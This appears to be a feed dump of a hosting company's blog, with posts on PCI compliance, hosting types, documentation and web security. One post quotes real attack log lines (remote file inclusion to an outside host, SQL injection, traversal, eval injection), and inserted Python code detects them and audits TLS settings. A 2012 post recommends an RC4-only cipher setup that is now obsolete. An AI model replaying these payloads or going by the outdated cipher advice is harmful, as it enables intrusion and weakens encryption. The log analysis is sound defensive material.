PCI Compliance | DynamicNet, Inc. https://dni.hosting
PCI Compliant, Secure, and Performance Optimized Wordpress Hosting

TLSv1.0 and PCI Compliance. https://dni.hosting/tlsv1-0-and-pci-compliance/ Thu, 14 May 2015 05:07:56 +0000 http://www.dynamicnet.net/?p=4802

PCI DSS compliance requires that TLSv1.0 be disabled by June 2016. The downside is that any browser IE10 and prior will not be able to connect to your website. Those clients will need to upgrade their browser, use a different browser, or get a fix from their browser vendor so they can use TLS 1.1 or higher. We had to upgrade our servers now, as PCI scanning vendors have already started failing PCI compliance scans for having TLSv1.0 enabled.

All our forward facing servers were patched and TLS1.0 disabled as per PCI compliance guidelines.

As always you can put your Trust in DNI to provide you fast response to your PCI Compliance issues.

Service Suspension https://dni.hosting/service-suspension/ Mon, 10 Dec 2012 14:00:53 +0000 http://www.dynamicnet.net/?p=4225

Have you ever taken a sales call where you absolutely knew you could solve the prospective customer’s pain for a reasonable investment (that in the long run would actually save them money), only to have them drop their mouth to the floor and complain your solution(s) are too expensive?

The next time I get a phone call to go over hacker clean up, server hardening, or server administration where the prospective customer is more concerned over the $100.00 per hour rate than the problem costing them customers and potentially their business, I hope I remember to share this article with them.

Imagine reading Service Suspension – Ongoing unanswered abuse complaints and thinking to yourself, the person is in a jam… I hope they get someone who can really help them (maybe we could, not sure), then later on reading that the person who initiated the post also runs an “All you can Eat” (i.e. unlimited support tickets, unlimited labor time) server administration business where they advertise a long list of what they can do for you for just $15.00 per month. I guess they are so packed with work they could not solve their own problems.

Imagine, for just $15.00 per month you get “24/7/365 USA-Based Technical Support” plus “24/7/365 Server Monitoring (5 Minute Intervals)” of your servers plus “Guaranteed 15 Minute Response On Monitoring Alerts” and so much more… sounds like a great deal? Right?

Now, I’m sure if you did a study of people who have heard and even believe in the quote, “you get what you pay for,” or variations of it, the percentage would be high.

Yet, how many actually do their homework to determine if something is really too good to be true?

For example, would you know right away that $15.00 per month for 24×7 coverage 365 days per year with a guaranteed response time of 15-minutes and unlimited administrator work (i.e. unlimited hours of work per month) was a deal too good to be true?

What if they removed the word, “unlimited,” and only included one hour per month? Would it then be more realistic?

In order to answer that question, what’s the going hourly rate for a server administrator? For a security administrator?

In the United States, for a server administrator, the going hourly rate ranges from $30.00 per hour to $52.00 per hour; for security administrators, the hourly rate ranges from $38.00 per hour to $56.00 per hour. In both cases, that doesn’t include benefits.

If a company is saying you get just even one hour for $15.00 when the going rate for an experienced party is $30.00 to $38.00 at a minimum….. get the picture?

You might get marketing speak that the employees multi-task and can work on many tasks at the same time… but isn’t that like someone who worked 2,000 real hours putting down 6,000 billable hours?

What are your thoughts on this subject? Did you purchase time thinking the rate was good or even average only to find out you were taken in by a “too good to be true” event? Let us know your thoughts below.

Hacker Attack Vectors https://dni.hosting/hacker-attack-vectors/ Mon, 29 Oct 2012 13:00:26 +0000 http://www.dynamicnet.net/?p=4443

Repeat after me, “hackers most often target vulnerabilities, not specific people or companies.” Now, say that over and over again, and shortly you should come to the conclusion that every single device and application typically has vulnerabilities, which makes everyone a target.

That’s right, everyone is a potential target — not just the big names, not just the rich companies, etc.

Now, web-based hack attempts come in many forms ranging from brute force to SQL injections.

Here’s a list of the common types including links to their definitions:

I would like to share with you what each of the above types looks like from a log file or security report perspective.

The following comes from our proactive security monitoring service as well as the reports we receive from our global security service.

I’m going to start off with the most common type we see which is remote file inclusion:

184.107.145.18 - - [06/Sep/2012:01:13:27 -0400] "GET /packages//wp-content/themes/metamorphosis/functions/thumb.php?src=http://www.blogger.com.moulinsaeau-41.org/cache.php HTTP/1.1" 404 3612 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)

The above is a timthumb attack where the attacker believes the Metamorphosis theme for WordPress is vulnerable; they are trying to include the code from http://www.blogger.com.moulinsaeau-41.org/cache.php through the potential vulnerability.

The next type is an SQL injection attack:

84.235.73.226 - - [09/Sep/2012:01:16:03 +0100] "GET /merchandise.php?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x6A6F686E73746F6E5F6965%20limit%200,1),2,3,4,5-- HTTP/1.1" 500 3506 "-" "-" UEvfw1Qz7pgAAGfUdE0 "-"

The next is a directory traversal attack:

195.157.13.221 - - [05/Sep/2012:21:28:20 +0100] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 500 3506 "-" "-" UEe15FQz7pAAABD2KuM "-"

What follows is an example of a local file inclusion:

190.90.209.251 - - [05/Sep/2012:18:13:46 +0100] "GET /phpMyAdmin//config/config.inc.php?eval=echo%20md5(123); HTTP/1.1" 500 3506 "-" "-" UEeISlWFNc8AABl2Nvw "-"

Below are two examples of brute force — one for SSH, the other for email:

sshd[21192]: Invalid user deploy from 64.185.229.239
vpopmail[7134]: vchkpw-pop3: vpopmail user not found webmaster@:88.43.116.246
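As an added example (my own code, not from the post or from DynamicNet), here is a small Python classifier that applies the post's own labels to the log lines quoted above, so a daily log review produces a per-label tally instead of a wall of text. The web-log regex, the attack patterns, the parameter names treated as "code-carrying" (eval, cmd, exec, system) and the two benign 192.0.2.x requests are my assumptions and constructions; the six attack lines are the ones quoted in the post. The classifier also handles double URL-encoding (e.g. `..%252F`), which the post's examples do not show.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Sample input: the six log lines quoted in the post, plus two constructed
# benign requests (192.0.2.x addresses) that the classifier must not flag.
SAMPLE_LOG = [
    '184.107.145.18 - - [06/Sep/2012:01:13:27 -0400] "GET /packages//wp-content/themes/metamorphosis/functions/thumb.php?src=http://www.blogger.com.moulinsaeau-41.org/cache.php HTTP/1.1" 404 3612 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)"',
    '84.235.73.226 - - [09/Sep/2012:01:16:03 +0100] "GET /merchandise.php?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x6A6F686E73746F6E5F6965%20limit%200,1),2,3,4,5-- HTTP/1.1" 500 3506 "-" "-"',
    '195.157.13.221 - - [05/Sep/2012:21:28:20 +0100] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 500 3506 "-" "-"',
    '190.90.209.251 - - [05/Sep/2012:18:13:46 +0100] "GET /phpMyAdmin//config/config.inc.php?eval=echo%20md5(123); HTTP/1.1" 500 3506 "-" "-"',
    '192.0.2.10 - - [05/Sep/2012:18:20:00 +0100] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [05/Sep/2012:18:21:00 +0100] "GET /wp-content/themes/metamorphosis/style.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    'sshd[21192]: Invalid user deploy from 64.185.229.239',
    'vpopmail[7134]: vchkpw-pop3: vpopmail user not found webmaster@:88.43.116.246',
]

# Apache combined-log request line (assumed format), sshd and vpopmail auth failures.
WEB_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SSH_RE = re.compile(r'sshd\[\d+\]: Invalid user (?P<user>\S+) from (?P<ip>\S+)')
POP_RE = re.compile(r'vpopmail\[\d+\]: vchkpw-\w+: vpopmail user not found (?P<user>\S*?):(?P<ip>\S+)')

SQLI_RE = re.compile(r'\bunion\b.*?\bselect\b|information_schema|\bor\b\s+1\s*=\s*1', re.I | re.S)
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|\x00)')
CODE_PARAMS = {'eval', 'cmd', 'exec', 'system'}  # assumed: parameter names that carry code, not data


def classify_request(target):
    """Map a request target (path?query) to the label the post uses, or None if it looks benign."""
    _, _, query = target.partition('?')
    decoded = unquote(unquote(target))  # two rounds so %252F-style double encoding is caught
    for name, value in parse_qsl(unquote(query), keep_blank_values=True):
        # Remote file inclusion: a parameter whose value is itself a URL to pull code from.
        if re.match(r'(https?|ftp)://', value, re.I):
            return 'remote file inclusion'
        # The post's local file inclusion example: PHP handed in through an eval-style parameter.
        if name.lower() in CODE_PARAMS and value.strip():
            return 'local file inclusion'
    if TRAVERSAL_RE.search(decoded):
        return 'directory traversal'
    if SQLI_RE.search(decoded):
        return 'sql injection'
    return None


def analyze(lines):
    """Return one (source_ip, label) event per suspicious line; benign lines produce nothing."""
    events = []
    for line in lines:
        m = WEB_RE.match(line)
        if m:
            label = classify_request(m.group('target'))
            if label:
                events.append((m.group('ip'), label))
            continue
        m = SSH_RE.search(line)
        if m:
            events.append((m.group('ip'), 'brute force (ssh)'))
            continue
        m = POP_RE.search(line)
        if m:
            events.append((m.group('ip'), 'brute force (pop3)'))
    return events


def summarize(lines):
    """Count events per label: the tally a daily log reviewer would look at first."""
    return Counter(label for _, label in analyze(lines))


if __name__ == '__main__':
    for ip, label in analyze(SAMPLE_LOG):
        print(f'{label:<22} from {ip}')
    print(dict(summarize(SAMPLE_LOG)))
```

Feed it a real access_log and auth log by replacing SAMPLE_LOG with the file's lines; the patterns are deliberately narrow (they match the post's examples, not every variant), so treat a hit as a reason to look, and a miss as no evidence either way.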

Do you review your hosting log files on a regular basis to see what attacks are getting through or being blocked?

Is your provider doing this for you?

Please let us know your questions and thoughts in the comments below.

Shared, VPS, Dedicated, or Cloud https://dni.hosting/shared-vps-dedicated-cloud/ Mon, 08 Oct 2012 13:00:05 +0000 http://www.dynamicnet.net/?p=3759

One of the common questions I hear from business stewards is, “How do I know what type of hosting to get? Will shared hosting be enough?”

I also hear the variations of the above that often come in the form of, “my _______ told me I needed a dedicated server; what do you think?”

Let me share with you some thoughts and guidelines which will hopefully help you, if you are in the position of asking this question for your organization.

Oh, before I forget, let’s do some simple housekeeping first.

  1. Shared hosting is where one to many sites from different customers are hosted in the same environment (which in today’s age, could be in the cloud, one or more dedicated servers, or even one or more virtual machines). This environment is very similar to an apartment complex or condo where a number of resources are shared among the consumers.
  2. VPS or virtual private server is where a slice of a cloud or dedicated server is provisioned for use by one customer.
  3. Dedicated is where one to many physical servers are provisioned for use by one customer.
  4. Cloud is where customers can provision off the exact resources they need within the scope of the provider; and modify what they need on demand (or close enough).

While stability in the cloud continues to improve, most of this article is going to be dedicated to the first three of the above, as most of our customer base are businesses where stability and reliability matter more than being on the cutting edge of technology.

Let me walk you through some what if statements that generally lead to the type of hosting you will need.

What if I know exactly what resources — RAM, hard drive space, CPU power, bandwidth, etc. — I need, and I love to micromanage (I’ll be sure to check x times per y period if I need to add or reduce specific resources)? Well, then your best bet would be Cloud hosting where you decide what you need, pay for only what you use, and you have the ability to spend your time micromanaging the solution.

What if I know the specific server (i.e. web server, email server, database server, etc. — which is very different from end user applications such as WordPress, Joomla, or Drupal) software I want to run, and I want to have version control of the server software? Then you are looking at Cloud, Dedicated, or VPS.

What if I want to manage my own hosting environment? Then you are looking at Cloud, Dedicated, or VPS.

Ok, I’m a developer (or my developer shared this) and I’m ok with shared hosting, but I know in advance my custom (often site-based) application(s) will require 30 or more simultaneous MySQL connections, at least 256 MB of dedicated RAM, and 50+ simultaneous Apache clients per second. What do I need? Chances are high you are looking at Cloud, Dedicated, or VPS. The more RAM, MySQL connections, and processes (overall, not just Apache) you need, the higher the probability you would need Cloud or Dedicated.

What if I have a brand new site? Then shared hosting will probably fit you for a period of time.

What if I will be running stock site-based software such as WordPress, Drupal, and Joomla? Then shared hosting will most likely fit you.

What are the pros and cons of each type of hosting?

Cloud, Dedicated, and VPS — unless specifically provided as a managed service (and then you need to ask what is being managed?) — put you in control of the hosting environment. You and your team are the security administrator, the server administrator, and the general housekeeper.

The pro for Cloud, Dedicated, and VPS is that sharing is limited (for Cloud and VPS there is still sharing of the physical hardware to a degree) to non-existent (Dedicated is all yours). You often get to run the operating system and version of your choice, the web server and version of your choice, the database server and version of your choice, and so on.

Shared hosting often comes with management; and if you are with a solid company, between a hosting automation system and their support, your hands are held through the years.

Please consider reading my own reflections on managed shared hosting where over the years, one of our managed shared hosting customers was featured on a major TV network; and shared hosting was not only economical in comparison to the revenue generated, but shared hosting was very capable at handling their ecommerce needs.

The con for shared hosting is that if you have special needs for the server-based software, you are at the mercy of whether the provider can meet those needs without impacting their other customers or not. In the latter case, you often have the choice to upgrade to a VPS, Dedicated, or Cloud; and most providers who offer multiple types of hosting will provide free migrations from one of their platforms to another (just be sure to ask rather than assume).

What about you?

What has your experience been in terms of finding out the type of hosting you need?

What type of hosting are you using now? Why did you pick that type of hosting?

Please use the comments to let us know.

Thank you.

SSL Beast and RC4-SHA https://dni.hosting/ssl-beast-rc4-sha/ Wed, 19 Sep 2012 13:00:58 +0000 http://www.dynamicnet.net/?p=4482

While there are a growing number of technical articles on how to protect your Apache based server against the SSL Beast, I’ve yet to see an article that goes into the SSL Cipher Suite that should be used for allowing only RC4-SHA and nothing else.

This past weekend, I found out that some authorized PCI Compliance Scanning vendors will only grant you PCI Compliance status if your SSL Beast protection setup only allows for RC4-SHA and nothing else.

If you have such a vendor, then the following are the settings you would use in your Apache 2 httpd.conf configuration file:

SSLProtocol -ALL +SSLv3 +TLSv1
SSLCipherSuite RC4-SHA:HIGH:!ADH:!AES256-SHA:!ECDHE-RSA-AES256-SHA384:!AES128-SHA:!DES-CBC3-SHA:!DES-CBC3-MD5:!IDEA-CBC-SHA:!RC4-MD5:!IDEA-CBC-MD5:!RC2-CBC-MD5:!MD5:!aNULL:!EDH:!AESGCM
SSLHonorCipherOrder on

You can test your settings by running the following (preferably on another server):

openssl s_client -connect [ssl public machine name]:443 -cipher RC4-SHA
openssl s_client -connect [ssl public machine name]:443 -cipher DES-CBC3-SHA
openssl s_client -connect [ssl public machine name]:443 -cipher AES256-SHA

And so on for the various ciphers; only the RC4-SHA should connect.
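Added example (my own code, not the post's or DynamicNet's) that automates the manual openssl s_client checks above and also covers the 2015 TLSv1.0 post at the top of this page: it builds the same s_client commands, parses the "New, <protocol>, Cipher is <cipher>" line that s_client prints to decide whether the server accepted each probe, and compares the outcome against a table of what should and should not connect. The host name ssl.example.test, both probe tables and the abbreviated s_client transcripts used for offline testing are constructed placeholders; `-cipher`, `-tls1` and `-tls1_2` are real s_client options. The RC4 table reproduces this 2012 post's expectation for the record only: RC4 has since been prohibited for TLS by RFC 7465, and the TLSv1.0 post already requires TLSv1.0 off, so the second table is the one to run today.

```python
import re
import subprocess

# Probe tables: (label, extra s_client arguments, should the handshake succeed?).
# First table: this post's expectation (only RC4-SHA connects).
BEAST_RC4_PROBES = [
    ("cipher RC4-SHA", ["-cipher", "RC4-SHA"], True),
    ("cipher DES-CBC3-SHA", ["-cipher", "DES-CBC3-SHA"], False),
    ("cipher AES256-SHA", ["-cipher", "AES256-SHA"], False),
]
# Second table: the TLSv1.0 post's expectation (TLSv1.0 refused, TLSv1.2 accepted).
NO_TLS10_PROBES = [
    ("protocol TLSv1.0", ["-tls1"], False),
    ("protocol TLSv1.2", ["-tls1_2"], True),
]


def s_client_command(host, extra_args, port=443):
    """The openssl s_client invocation the post runs by hand, one probe at a time."""
    return ["openssl", "s_client", "-connect", f"{host}:{port}", *extra_args]


# s_client prints "New, TLSv1/SSLv3, Cipher is RC4-SHA" on success and
# "New, (NONE), Cipher is (NONE)" when the server refused the handshake.
NEGOTIATED_RE = re.compile(r"^New, (?P<proto>\S+), Cipher is (?P<cipher>\S+)", re.M)


def negotiated(output):
    """Return (protocol, cipher) from s_client output, or None when no session was set up."""
    m = NEGOTIATED_RE.search(output)
    if not m or m.group("cipher") == "(NONE)":
        return None
    return m.group("proto"), m.group("cipher")


def run_probe(host, extra_args):
    """Talk to a real server. stdin is closed so s_client exits right after the handshake."""
    proc = subprocess.run(s_client_command(host, extra_args), input="",
                          capture_output=True, text=True, timeout=20)
    return proc.stdout + proc.stderr


def audit(host, probes, runner=run_probe):
    """For each probe record whether it was accepted and whether that matches policy.
    `runner` is injectable so the parsing can be exercised without a network."""
    report = {}
    for label, extra_args, should_connect in probes:
        session = negotiated(runner(host, extra_args))
        accepted = session is not None
        report[label] = {"accepted": accepted,
                         "as_expected": accepted == should_connect,
                         "session": session}
    return report


def policy_holds(report):
    """True only if every probe behaved as the table says it should."""
    return all(entry["as_expected"] for entry in report.values())


# Constructed, abbreviated s_client transcripts for offline runs (not captured from a real host).
CONSTRUCTED_OUTPUT = {
    ("-cipher", "RC4-SHA"): "CONNECTED(00000003)\n---\nNew, TLSv1/SSLv3, Cipher is RC4-SHA\n",
    ("-cipher", "DES-CBC3-SHA"): "CONNECTED(00000003)\nssl handshake failure\n---\nNew, (NONE), Cipher is (NONE)\n",
    ("-cipher", "AES256-SHA"): "CONNECTED(00000003)\nssl handshake failure\n---\nNew, (NONE), Cipher is (NONE)\n",
    ("-tls1",): "CONNECTED(00000003)\ntlsv1 alert protocol version\n---\nNew, (NONE), Cipher is (NONE)\n",
    ("-tls1_2",): "CONNECTED(00000003)\n---\nNew, TLSv1.2, Cipher is ECDHE-RSA-AES128-GCM-SHA256\n",
}


def constructed_runner(host, extra_args):
    return CONSTRUCTED_OUTPUT[tuple(extra_args)]


if __name__ == "__main__":
    import sys
    # With a host name on the command line the probes go over the network; otherwise
    # the constructed transcripts are used so the script demonstrates itself offline.
    host = sys.argv[1] if len(sys.argv) > 1 else "ssl.example.test"
    runner = run_probe if len(sys.argv) > 1 else constructed_runner
    for name, probes in (("BEAST/RC4-SHA", BEAST_RC4_PROBES), ("no TLSv1.0", NO_TLS10_PROBES)):
        report = audit(host, probes, runner)
        print(name, "OK" if policy_holds(report) else "VIOLATION", report)
```

Before deploying an SSLCipherSuite string, `openssl ciphers -v '<the string>'` lists exactly which suites it expands to on that OpenSSL build, which is the quickest way to see whether a `!` exclusion did what you meant; the probe script then confirms what the live server actually negotiates.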

If you know of a more elegant way to adjust the SSLCipherSuite to only allow RC4-SHA please let us know using the comment form below.

The importance of documentation https://dni.hosting/importance-documentation/ Mon, 10 Sep 2012 13:00:21 +0000 http://www.dynamicnet.net/?p=4300

I would like to share with you a recent, real life story of what happens to small businesses when there is little to no documentation.

I’m hoping to encourage you to review the documentation standards you have set forth for your small business; and potentially to do an in-house audit to ensure critical areas are covered.

In late August 2012, we received a call from the CEO of a small business whose web development person left their employment. They found out about our server administration services from SoftLayer as we are a SoftLayer certified partner.

They needed to update their web site for which they did not have the FTP login credentials; and they needed to generate a CSR (Certificate signing request) in order to renew the secure certificate for their web site so that https would continue to work.

Together, we hoped that given the server login credentials (which they did have on hand) that we could locate the FTP user, reset the FTP user password, and test FTP access with that information; and then use the server-based tools to generate the CSR for the secure certificate, and install it when they received it from the digital ID provider.

To keep the story short without going into the server administration details, the information they had on file was for a Citrix XenServer which was running multiple virtual machines. The web site for which they needed the FTP reset and a CSR generated was on one of the virtual machines.

There was no documentation as to which virtual machine other than a public IP address of the web site.

The non-virtual equivalent is that you are given the keys to a safe. You open the safe and find several other safes within; and while you might be able to guess which safe is the right one within the safe, you don’t have the means to open it.

SoftLayer’s extremely well automated portal provided one of several means available to document the server environment; but notes were not put into its notes area recording which private IP address belonged to which virtual machine, which would also have helped.

While we were able to narrow down which virtual machine (aka safe) was most likely the correct one, ssh (remote access) appeared to be filtered by IP address… and you needed to access the virtual machine in order to tell it which IP addresses to allow.

The bottom line for this small business is potentially rebuilding everything from the ground up for costs in the double digit thousands of dollars (if not more).

If you are the CEO, COO, CSO, CTO, President, owner, steward, or otherwise “the buck stops here” person, when was the last time you audited what documentation is in place for the following?:

  • Employee handbook – ensuring it covers documentation expectations and requirements.
  • Web site(s) – login credentials for every application, control panel, FTP, email, statistics / analytics along with daily, weekly, biweekly, monthly, etc. processes and procedures along with application names, versions, etc.
  • Server(s) – specifications, login credentials, public IP, private IP. If there are virtual machines, the same — do you know where your servers are located? Names and contact information of responsible parties having what responsibilities?
  • Change log – what installations, deletions, changes have been taking place — date, time, where, what, who, why, how, notes, etc?
  • Contact information – name, company, mailing address, physical address, phone numbers, email, and when or why would they be contacted.
  • Other? — What’s necessary for someone to take over your responsibilities if you are the last one standing, and need to pass on the baton?

As you do the audit, ask yourself (and hopefully check your thought process with trusted other parties) — if the responsible person for jobs a, b, and c were inaccessible tomorrow, would someone be able to take over quickly just based on the documentation that we have in place?

If the answer is “no,” then a level of priority should be given to making sure there is enough documentation (that is reviewed and tested for quality assurance) so the processes, procedures, tasks, and related responsibilities can be easily picked up by a new party.

Lastly, who knows where the documentation is located, and how to use the documentation?

Have you run into any nightmares in your business that proper documentation beforehand could have prevented or made less costly? Please share in the comments below.

Scalable, Fast, Secure Ecommerce with ShopSite https://dni.hosting/shopsite/ Mon, 03 Sep 2012 13:00:37 +0000 http://www.dynamicnet.net/?p=4367

I recently had the wonderful opportunity to read a well written book by Melinda F. Emerson, Become Your Own Boss In 12 Months.

Melinda, who hosts the Small Business Chat on twitter every Wednesday night from 8 PM to 9 PM Eastern Time, focuses on helping people become entrepreneurs and for the small businesses they create to grow and succeed.

A lot of what Melinda shares involves proper planning and preparation.

Whether you have been in business for many years, or are just starting up… did you know that if you properly plan and prepare for your ecommerce store you greatly increase your opportunity to succeed?

If you are nodding your head, do you know how many business managers just leave this decision to their “Web” person or “IT” person?

The wrong choice in this area often leads to two major areas which can ruin your business:

  1. Hacked store with stolen customer information which can ruin the reputation of the business.
  2. Performance issues where you must choose between ever more expensive hosting to scale up with the hosting environment needs of the ecommerce system, or face a complete redesign with another ecommerce system.

Over the past 17 years in business, we’ve seen, read, or heard about the above two issues so often, we’ve lost count.

As you take ownership and responsibility of the decision for picking a shopping cart / ecommerce system, I encourage you to ask the following questions:

  1. Is the ecommerce system PCI DSS certified (if the answer is no, attaining payment card industry (PCI) compliance runs from impossible to expensive)?
  2. When was the last security bug (problem, issue, report, etc.) filed for the system on Secunia’s Vulnerability Database?
  3. How many times per year has a security bug been reported over the last 15 years (the more frequently bugs are published, the more likely there are unreported security bugs as well)?
  4. How long has the company that created the ecommerce system been in business (unfortunately a lot of businesses five years old or less fail)?
  5. Does the ecommerce shopping cart provider list certified technology partners that can assist you if you run into problems using the system?
  6. Is the ecommerce system fully portable should you need to move to a different hosting provider?
  7. Will the ecommerce system work on the smallest of shared hosting plans?
  8. How well does the shopping cart system scale? How long can you stay in a shared hosting environment to keep your monthly hosting investment to a minimum?

While you do need to trust the people with whom you are working, if you are the steward / manager of the business, the buck stops with you; and, I would encourage you to double check against any bias which may cost you your business.

I would like to share with you why you should consider ShopSite from ShopSite.com as the only ecommerce shopping cart you will need.

ShopSite is VISA PA DSS Certified. Since 1998 (when we started using and offering ShopSite as a ShopSite certified technology partner), any customer of ours using ShopSite who has a PCI Compliance Scan has ShopSite passing with flying colors.

In all of the years ShopSite has been available, they’ve only had one (1) security issue back in 1996. Compared to any other cart, that is outright amazing!!!

ShopSite has been in business for almost two decades. Very few other companies compare.

ShopSite has certified designers and certified technology / hosting partners. Dynamic Net is a certified technology / hosting partner; and we maintain relationships with certified ShopSite designers.

ShopSite is extremely portable, especially if you purchase the license vs. renting (it is still portable with renting; but you want to confirm that with the hosting provider from whom you rent the software prior to renting it — for us, it is 100% portable).

ShopSite is extremely fast (it is compiled code vs. interpreted PHP, Perl CGI, etc.); and ShopSite scales extremely well in a shared hosting environment.

ShopSite ecommerce stores have handled massive floods of traffic when the business is featured on national media in a shared hosting environment.

ShopSite is relatively web server agnostic; you don’t have to worry about a down ecommerce store because your hosting provider updated the operating system, the web server software, or the database software.

Please contact us if you have questions as to why ShopSite would be the only ecommerce system / shopping cart software your small to medium business will ever need.

Please share your thoughts and questions about this article below in the comment area.

Trust and Security https://dni.hosting/trust-security/ Mon, 27 Aug 2012 13:00:15 +0000 http://www.dynamicnet.net/?p=3533 Fiduciary is not a word you hear or read often as a small to medium business (SMB) owner.

Yet if you are the steward of any size business, fiduciary should be an active word in how you manage your business.

How does this relate to trust, security, and your business on the Internet? Let’s see.

In the recent past I’ve been involved in conversations with stewards of small businesses where the conversation went as follows.

Case 1:

Small business owner poses a problem in WordPress on their site in the LinkedIn WordPress Group.

One of the WordPress developers sends the small business owner a private message stating they would be happy to help fix the problem.

Small business owner sends over WordPress login credentials for his site; and shares on LinkedIn what’s going on.

I share with the owner they should change their WordPress login credentials once things are fixed.

Small business owner replies, “I trust ________; they’ve helped me in the past.”

What do you think is the Fiduciary responsibility of the owner?

Case 2:

Small business owner posts on Google+ concerning a tool that was shared with him by a “trusted” friend that checks if the LinkedIn password has been cracked.

I share that the best practice is to avoid such tools altogether, and to go directly to LinkedIn’s site and change the password with LinkedIn itself.

There are many reasons, ranging from the security of the site hosting the tool, to who has access to the tool’s log files and the server’s log files, to what data the site is collecting from cookies and from the data entered.

The owner replied they trust the person who told them about the tool; and no one should ever question that person or the trust relationship.

What do you think is the Fiduciary responsibility of the owner?


I’ve worked for small to medium businesses over the past 30 some years.

I still remember working for my first medium business — American Equipment Leasing — when I was shocked to see the exit process of my manager (that was my first experience with best practice for when an employee is no longer an employee).

At the time I thought it was harsh that my boss was escorted to his desk, closely monitored while packing his personal belongings, and escorted out, while in the meantime the information technology (IT) department was given orders to make sure all access and clearance points were terminated.

I used to frown at the phrase, “it’s not personal, it’s business.” I would think to myself, isn’t it personal? And in some cases, how personal can it get?

Yet, the bottom line is best practice doesn’t take into account feelings. Best practice takes into account doing what is right period.

It is not about trusting someone or not trusting someone. It is about taking 100% fiduciary responsibility for the task at hand.

The Security Dance – Part 2 https://dni.hosting/you-are-the-boss-of-security/ Mon, 30 Jul 2012 13:00:12 +0000 http://www.dynamicnet.net/?p=3432

Welcome back! Last week’s article, There are no wallflowers at the security dance! Get to know your dance partners, covered getting to know your security dance partners.

If you are the business steward or a part of the management team, you already know the burden of responsibility for having a secure web site where your reputation, customers, sales, and business can be won or lost due to a defacement or other forms of security breaches.

While it is easy to say, “my web person handles that for me” or “I outsource it to so and so,” that does not mitigate the risk or otherwise make your life any easier if what you believe was going on, was not taking place.

Below is a check list you can use to help you take charge, and be the boss in the area of site security:

Dance Partner / Area of Responsibility / Doing their job?

Data Center
  • Has and maintains SSAE 16 certification?
  • Has an abuse department with strict policies on resolving abuse complaints promptly?

Hosting Provider
  • Is their own site PCI Compliant?
  • Is willing to walk you through the PCI Compliance process?
  • Has an abuse department with strict policies on resolving abuse complaints promptly?
  • Secures their servers, and maintains the security?
  • Has and maintains an intrusion detection system?
  • Reviews server logs daily and security reports frequently throughout the day?
  • Performs daily, off-site backups?
  • Can clearly describe how they would deal with a customer whose site has been hacked, from start to finish?

Payment gateway provider
  • Has and maintains PCI Compliance?
  • Has not had a data breach involving customer data in the past two years?

Web designer / developer
  • Reviews site error logs and statistics weekly, passing on any abnormal activity to the hosting provider for investigation?
  • Performs regular backups of the site and database(s) used by the site?
  • Only installs applications which are being maintained, from vendors who take security seriously?
  • Regularly reviews the site and database for removal of unnecessary applications and items?
  • Makes sure all applications, plugins, and themes are up to date?

Verify that each dance partner is on the same page with you; and that they are doing their job.

You are the boss, and there will be times the partners need to be educated to pick up the pace, do their job, or be replaced.

In case you are wondering where we fit in, here’s how the check list above looks for Dynamic Net, Inc.:

Dance Partner / Area of Responsibility / Doing their job?

SoftLayer
  • Has and maintains SSAE 16 certification? Yes
  • Has an abuse department with strict policies on resolving abuse complaints promptly? Yes

Dynamic Net
  • Is their own site PCI Compliant? Yes
  • Is willing to walk you through the PCI Compliance process? Yes
  • Has an abuse department with strict policies on resolving abuse complaints promptly? Yes
  • Secures their servers, and maintains the security? Yes
  • Has and maintains an intrusion detection system? Yes
  • Reviews server logs daily and security reports frequently throughout the day? Yes
  • Performs daily, off-site backups? Yes
  • Can clearly describe how they would deal with a customer whose site has been hacked, from start to finish? Contact us to find out

The overwhelming majority of our customers are small businesses who want peace of mind in knowing their hosting provider and the data centers used by their hosting provider are doing their job.

If you are not 100% happy that your hosting provider and their data center is doing their job in keeping your web site secure and safe, then contact us. We will be happy to talk with you or have an email conversation with you.

The Security Dance – Part 1 https://dni.hosting/security-dance/ Mon, 23 Jul 2012 13:00:39 +0000 http://www.dynamicnet.net/?p=3372

If you have your business on the Internet, you are a part of a line dance.

You can choose to be a wallflower, and face the consequences of doing nothing.

Or you can get to know your fellow dance partners (maybe picking replacements for ones that no longer fit), and be an active member of the security dance.

I have the privilege of communicating with small business stewards on an almost daily basis.

Some of the common things I read and hear concerning security are as follows:

  • Don’t hackers just go after big companies?
  • There’s nothing special about my web site that hackers would want.
  • My hosting provider handles all of the security.

Unfortunately, all of the above statements have the business steward and their team being wallflowers rather than active participants in a perpetual dance that only ends when they stop having their business on the Internet.

Now, you might be ok being a wallflower at a social dance. Maybe you just go to sit and watch the other people dance. Maybe you just go for the music and the food. For a social dance, there’s little impact.

The impact for being a wallflower with a business on the Internet can lead to poor reputation, lost customers, lost income, and having to spend a lot of time to fix one or more situations that could have been prevented.

What does that mean?

While targeted hacking exists, the majority of hacking deals with vulnerabilities. Think of it like a gang going through the parking lot to see who was apathetic enough to leave their vehicle unlocked or that plus the keys still in the car.

This makes every single resource — web site, email, DNS, servers, routers, etc. — a target for hackers.

Now, let’s get back to dancing. I’m talking about old-fashioned slow dancing where you and your dance partner are close, hold hands, and watch out for one another on the dance floor.

Let’s relate that to a security dance, except rather than just two people dancing together, you have several in the form of a line dance.

Each dance partner needs to take as much responsibility in an active manner as they can to help and protect one another.

In this security dance, you have the following partners when you are looking specifically in the area of web hosting (including email, database and DNS):

  • The business steward and their team.
  • The web site designer and their team (if applicable — some small businesses do this in-house).
